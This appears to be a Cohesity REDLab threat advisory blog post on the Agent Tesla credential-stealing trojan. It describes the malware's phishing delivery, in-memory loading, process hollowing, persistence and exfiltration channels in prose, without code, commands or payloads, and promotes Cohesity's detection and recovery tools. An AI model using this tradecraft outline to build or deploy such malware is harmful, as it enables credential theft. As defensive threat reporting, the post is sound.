Agent Tesla Returns: The Old RAT with New Tricks

Introduction

Cohesity REDLab has released updates to its threat library in response to renewed activity related to Agent Tesla which is a Remote Access Trojan (RAT) and credential stealer. The Center for Internet Security (CIS) recently added Agent Tesla to its TOP 10 malware list for Q3 of 2025. Agent Tesla has evolved into one of the most prevalent malware families targeting organizations worldwide. First observed in 2014, Agent Tesla is written in .NET and is widely distributed via phishing campaigns, malicious attachments, and exploit kits. Its adaptability and modular design make it a persistent threat to enterprise environments, especially as attackers refine delivery techniques to bypass modern defenses. 

How Agent Tesla Works

• Initial Delivery: Socially engineered emails, often impersonating trusted brands, deliver compressed archives containing obfuscated JavaScript or malicious executables. 
• Scripted Execution: The JavaScript downloader fetches a PowerShell script from a remote server, which then loads the Agent Tesla payload directly into memory. This in-memory execution, coupled with process injection, helps the malware evade endpoint detection. 
• Persistence and Evasion: Agent Tesla modifies registry keys for persistence and uses process hollowing to inject itself into legitimate Windows processes, complicating forensic analysis. 

Capabilities

Agent Tesla is a full-featured RAT with the following capabilities:

• Credential Theft: Extracts credentials from browsers, email clients, FTP/VPN software, and Windows Credential Vaults.
• Keylogging and Clipboard Capture: Records keystrokes and clipboard data for exfiltration.
• Screen Capture: Takes screenshots to gather sensitive information.
• Data Exfiltration: Uses SMTP, FTP, HTTP, and even Telegram APIs for command-and-control (C2) and data exfiltration.
• Obfuscation and Anti-Analysis: Employs packing, code obfuscation, and disables security tools to hinder detection.

Recent Campaigns and Trends

Multi-Stage Attacks

2025 saw a surge in sophisticated Agent Tesla campaigns employing multi-stage delivery chains. Attackers use layered scripts and payloads to evade static and behavioral detection. For example, recent campaigns targeted global sectors (like finance, manufacturing, and education) using WeTransfer-themed lures and QR code phishing tactics. 

Geographic Targeting

Targeted campaigns have been observed against organizations in the United States, Australia, Taiwan, and Mexico. Attackers leverage business email databases and compromised accounts to maximize infection rates. 

Technical Innovation

New loaders like QuirkyLoader facilitate DLL side-loading and process hollowing, further complicating detection and response.

REDLab’s Role in Enterprise Defense

Cohesity’s REDLab is a fully isolated, in-house security lab dedicated to validating cyber resilience against real-world threats. REDLab simulates attacks using live malware, including Agent Tesla, to benchmark detection accuracy and recovery capabilities. Key REDLab contributions include:

• Real-World Attack Simulation: Testing Cohesity’s products against the latest malware variants in an air-gapped environment.
• Detection Mechanism Development: Creating and updating Cohesity Threat Library to identify and respond to threats like Agent Tesla.
• Continuous Feedback Loop: Providing actionable intelligence to engineering teams to improve threat detection and recovery logic.

Defensive Strategies

Detection

• Rapid Threat Hunt: Use Cohesity Rapid Threat Hunts to hunt for malware using threat intelligence feeds. These feeds are updated daily with new information from intelligence sources like Google Threat Intelligence, CISA, Cohesity REDLab, Open Source and others. Users can search using default feeds or create custom feeds.
• Threat Scans: Run periodic threat scans using the default threat library that is updated daily or create a custom YARA rules. Users can also use third-part integration and threat intelligence vendors.
• Anti-ransomware: Users are advised to closely monitor the ML-based anti-ransomware backup anomalies in Security Center for detection of ransomware activity.

Response and Recovery

• Immutable Backups: Maintain air-gapped, immutable backups to ensure rapid recovery after an attack.
• Automated Recovery: Use solutions like Cohesity’s Recovery Agent for single-click cyber recovery and clean-room restoration. 
• Incident Response Playbooks: Prepare for multi-stage attacks with rehearsed response plans and stakeholder coordination.
• Threat Detection: Use threat detection features mentioned above before recovery to make sure that snapshots are clean.

Conclusion

Agent Tesla exemplifies the evolving sophistication of malware targeting enterprises. Its modular design, credential theft capabilities, and multi-stage delivery chains demand adaptive, intelligence-driven defenses. Cohesity REDLab’s proactive research and validation provide organizations with the tools and insights needed to detect, respond to, and recover from Agent Tesla and similar threats.

For the latest advisories and technical details, visit Cohesity REDLab.